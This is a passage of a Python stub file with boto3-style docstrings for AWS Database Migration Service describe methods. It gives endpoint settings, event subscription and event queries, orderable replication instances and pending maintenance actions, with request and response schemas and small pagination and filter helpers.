'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Endpoints** *(list) --*
Endpoint description.
- *(dict) --*
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the ``EndpointType``, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with cross-account access.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a newline (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files; set to NONE (the default) or omit the parameter to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server-side encryption you want to use for your data. This is part of the endpoint settings or the extra connection attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads, but writes become slower as the number of row groups grows. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the maximum row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update), or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` operations are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. Set this value to ``GZIP`` to compress the target files; set it to ``NONE`` (the default) or omit it to keep the files uncompressed.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when ``authType=NO`` .
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis source endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch source endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the Elasticsearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use.
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server-side encryption you want to use for your data. This is part of the endpoint settings or the extra connection attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of characters you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: endpoint-arn | endpoint-type | endpoint-id | engine-name
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
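The ``Filters`` parameter above is a list of ``{'Name': ..., 'Values': [...]}`` dicts. A small helper sketch (not part of boto3) that builds this shape from keyword criteria, using the filter names listed above (endpoint-arn | endpoint-type | endpoint-id | engine-name):

```python
# Sketch: build the Filters argument for describe_endpoints and
# similar describe_* calls from keyword criteria.
def make_filters(**criteria):
    filters = []
    for name, values in criteria.items():
        if isinstance(values, str):
            values = [values]
        # Python identifiers cannot contain '-', so '_' maps to '-'.
        filters.append({'Name': name.replace('_', '-'),
                        'Values': list(values)})
    return filters

flt = make_filters(endpoint_type='source',
                   engine_name=['mysql', 'postgres'])
```

The resulting ``flt`` can be passed directly as ``client.describe_endpoints(Filters=flt)``.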
"""
pass
def describe_event_categories(self, SourceType: str = None, Filters: List = None) -> Dict:
"""
Lists categories for all event source types, or, if specified, for a specified source type. You can see a list of the event categories and source types in `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEventCategories>`_
**Request Syntax**
::
response = client.describe_event_categories(
SourceType='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
**Response Syntax**
::
{
'EventCategoryGroupList': [
{
'SourceType': 'string',
'EventCategories': [
'string',
]
},
]
}
**Response Structure**
- *(dict) --*
- **EventCategoryGroupList** *(list) --*
A list of event categories.
- *(dict) --*
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **EventCategories** *(list) --*
A list of event categories for a ``SourceType`` that you want to subscribe to.
- *(string) --*
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates events.
Valid values: replication-instance | migration-task
:type Filters: list
:param Filters:
Filters applied to the action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:rtype: dict
:returns:
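The response groups categories under ``EventCategoryGroupList``. A sketch (shape assumed from the response syntax above) that flattens it into a ``{source_type: categories}`` mapping for easier lookup:

```python
# Sketch: flatten a describe_event_categories response into a
# {source_type: [categories]} dict.
def categories_by_source(response):
    return {g['SourceType']: g.get('EventCategories', [])
            for g in response.get('EventCategoryGroupList', [])}

demo = categories_by_source({
    'EventCategoryGroupList': [
        {'SourceType': 'replication-instance',
         'EventCategories': ['failure', 'low storage']},
    ]
})
```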
"""
pass
def describe_event_subscriptions(self, SubscriptionName: str = None, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Lists all the event subscriptions for a customer account. The description of a subscription includes ``SubscriptionName`` , ``SNSTopicARN`` , ``CustomerID`` , ``SourceType`` , ``SourceID`` , ``CreationTime`` , and ``Status`` .
If you specify ``SubscriptionName`` , this action lists the description for that subscription.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEventSubscriptions>`_
**Request Syntax**
::
response = client.describe_event_subscriptions(
SubscriptionName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'EventSubscriptionsList': [
{
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **EventSubscriptionsList** *(list) --*
A list of event subscriptions.
- *(dict) --*
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A list of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName:
The name of the AWS DMS event subscription to be described.
:type Filters: list
:param Filters:
Filters applied to the action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
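The "no-permission" and "topic-not-exist" statuses documented above both indicate a broken SNS link. A sketch (response shape taken from the response syntax above) that picks out such subscriptions:

```python
# Sketch: list subscription Ids whose status indicates AWS DMS can no
# longer deliver to the SNS topic, per the status values above.
_BROKEN = {'no-permission', 'topic-not-exist'}

def broken_subscriptions(response):
    return [s['CustSubscriptionId']
            for s in response.get('EventSubscriptionsList', [])
            if s.get('Status') in _BROKEN]

ids = broken_subscriptions({'EventSubscriptionsList': [
    {'CustSubscriptionId': 'sub-1', 'Status': 'active'},
    {'CustSubscriptionId': 'sub-2', 'Status': 'topic-not-exist'},
]})
```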
"""
pass
def describe_events(self, SourceIdentifier: str = None, SourceType: str = None, StartTime: datetime = None, EndTime: datetime = None, Duration: int = None, EventCategories: List = None, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Lists events for a given source identifier and source type. You can also specify a start and end time. For more information on AWS DMS events, see `Working with Events and Notifications <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Events.html>`__ in the *AWS Database Migration Service User Guide.*
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeEvents>`_
**Request Syntax**
::
response = client.describe_events(
SourceIdentifier='string',
SourceType='replication-instance',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1),
Duration=123,
EventCategories=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Events': [
{
'SourceIdentifier': 'string',
'SourceType': 'replication-instance',
'Message': 'string',
'EventCategories': [
'string',
],
'Date': datetime(2015, 1, 1)
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Events** *(list) --*
The events described.
- *(dict) --*
- **SourceIdentifier** *(string) --*
The identifier of the event source. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
Constraints: replication instance, endpoint, migration task
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | endpoint | migration-task
- **Message** *(string) --*
The event message.
- **EventCategories** *(list) --*
The event categories available for the specified source type.
- *(string) --*
- **Date** *(datetime) --*
The date of the event.
:type SourceIdentifier: string
:param SourceIdentifier:
The identifier of the event source. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens. It cannot end with a hyphen or contain two consecutive hyphens.
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates events.
Valid values: replication-instance | migration-task
:type StartTime: datetime
:param StartTime:
The start time for the events to be listed.
:type EndTime: datetime
:param EndTime:
The end time for the events to be listed.
:type Duration: integer
:param Duration:
The duration of the events to be listed.
:type EventCategories: list
:param EventCategories:
A list of event categories for a source type that you want to subscribe to.
- *(string) --*
:type Filters: list
:param Filters:
Filters applied to the action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
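``StartTime``/``EndTime`` and ``Duration`` are alternative ways to bound the event window. A small sketch (not part of boto3; treating ``Duration`` as minutes is an assumption, since the parameter description above does not state the unit) that assembles the keyword arguments:

```python
from datetime import datetime, timedelta, timezone

# Sketch: build describe_events kwargs for a recent time window.
def event_window(minutes=None, start=None, end=None):
    if minutes is not None:
        return {'Duration': minutes}  # assumed to be minutes
    end = end or datetime.now(timezone.utc)
    start = start or end - timedelta(hours=1)
    return {'StartTime': start, 'EndTime': end}

kwargs = event_window(minutes=30)
```

These kwargs can then be splatted into the call, e.g. ``client.describe_events(SourceType='replication-instance', **kwargs)``.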
"""
pass
def describe_orderable_replication_instances(self, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the replication instance types that can be created in the specified region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeOrderableReplicationInstances>`_
**Request Syntax**
::
response = client.describe_orderable_replication_instances(
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'OrderableReplicationInstances': [
{
'EngineVersion': 'string',
'ReplicationInstanceClass': 'string',
'StorageType': 'string',
'MinAllocatedStorage': 123,
'MaxAllocatedStorage': 123,
'DefaultAllocatedStorage': 123,
'IncludedAllocatedStorage': 123,
'AvailabilityZones': [
'string',
]
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **OrderableReplicationInstances** *(list) --*
The orderable replication instances available.
- *(dict) --*
- **EngineVersion** *(string) --*
The version of the replication engine.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **StorageType** *(string) --*
The type of storage used by the replication instance.
- **MinAllocatedStorage** *(integer) --*
The minimum amount of storage (in gigabytes) that can be allocated for the replication instance.
- **MaxAllocatedStorage** *(integer) --*
The maximum amount of storage (in gigabytes) that can be allocated for the replication instance.
- **DefaultAllocatedStorage** *(integer) --*
The default amount of storage (in gigabytes) that is allocated for the replication instance.
- **IncludedAllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **AvailabilityZones** *(list) --*
List of availability zones for this replication instance.
- *(string) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
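Because results are capped by ``MaxRecords``, callers typically follow the ``Marker`` token until it disappears. A minimal sketch of manual pagination (the ``iter_orderable_instances`` helper is hypothetical, not part of the API; ``client`` is assumed to be a DMS client exposing this method):

```python
def iter_orderable_instances(client, page_size=100):
    """Yield every orderable replication instance, following Marker tokens.

    `client` is assumed to be a boto3 DMS client; this helper is a
    hypothetical convenience wrapper, not part of the API itself.
    """
    kwargs = {'MaxRecords': page_size}
    while True:
        page = client.describe_orderable_replication_instances(**kwargs)
        # Each page carries a list of instance records plus an optional Marker.
        yield from page.get('OrderableReplicationInstances', [])
        marker = page.get('Marker')
        if not marker:
            break  # no Marker in the response means this was the last page
        kwargs['Marker'] = marker
```

The same loop shape applies to the other ``Describe*`` calls in this client that accept ``MaxRecords`` and ``Marker``.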
:rtype: dict
:returns:
"""
pass
def describe_pending_maintenance_actions(self, ReplicationInstanceArn: str = None, Filters: List = None, Marker: str = None, MaxRecords: int = None) -> Dict:
"""
For internal use only.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribePendingMaintenanceActions>`_
**Request Syntax**
::
response = client.describe_pending_maintenance_actions(
ReplicationInstanceArn='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
Marker='string',
MaxRecords=123
)
**Response Syntax**
::
{
'PendingMaintenanceActions': [
{
'ResourceIdentifier': 'string',
'PendingMaintenanceActionDetails': [
{
'Action': 'string',
'AutoAppliedAfterDate': datetime(2015, 1, 1),
'ForcedApplyDate': datetime(2015, 1, 1),
'OptInStatus': 'string',
'CurrentApplyDate': datetime(2015, 1, 1),
'Description': 'string'
},
]
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **PendingMaintenanceActions** *(list) --*
The pending maintenance actions.
- *(dict) --*
- **ResourceIdentifier** *(string) --*
The Amazon Resource Name (ARN) of the DMS resource that the pending maintenance action applies to. For information about creating an ARN, see `Constructing an Amazon Resource Name (ARN) <https://docs.aws.amazon.com/dms/latest/UserGuide/USER_Tagging.html#USER_Tagging.ARN>`__ in the DMS documentation.
- **PendingMaintenanceActionDetails** *(list) --*
Detailed information about the pending maintenance action.
- *(dict) --*
- **Action** *(string) --*
The type of pending maintenance action that is available for the resource.
- **AutoAppliedAfterDate** *(datetime) --*
The date of the maintenance window when the action will be applied. The maintenance action will be applied to the resource during its first maintenance window after this date. If this date is specified, any ``next-maintenance`` opt-in requests are ignored.
- **ForcedApplyDate** *(datetime) --*
The date when the maintenance action will be automatically applied. The maintenance action will be applied to the resource on this date regardless of the maintenance window for the resource. If this date is specified, any ``immediate`` opt-in requests are ignored.
- **OptInStatus** *(string) --*
Indicates the type of opt-in request that has been received for the resource.
- **CurrentApplyDate** *(datetime) --*
The effective date when the pending maintenance action will be applied to the resource. This date takes into account opt-in requests received from the ``ApplyPendingMaintenanceAction`` API, the ``AutoAppliedAfterDate`` , and the ``ForcedApplyDate`` . This value is blank if an opt-in request has not been received and nothing has been specified as ``AutoAppliedAfterDate`` or ``ForcedApplyDate`` .
- **Description** *(string) --*
A description providing more detail about the maintenance action.
- **Marker** *(string) --*
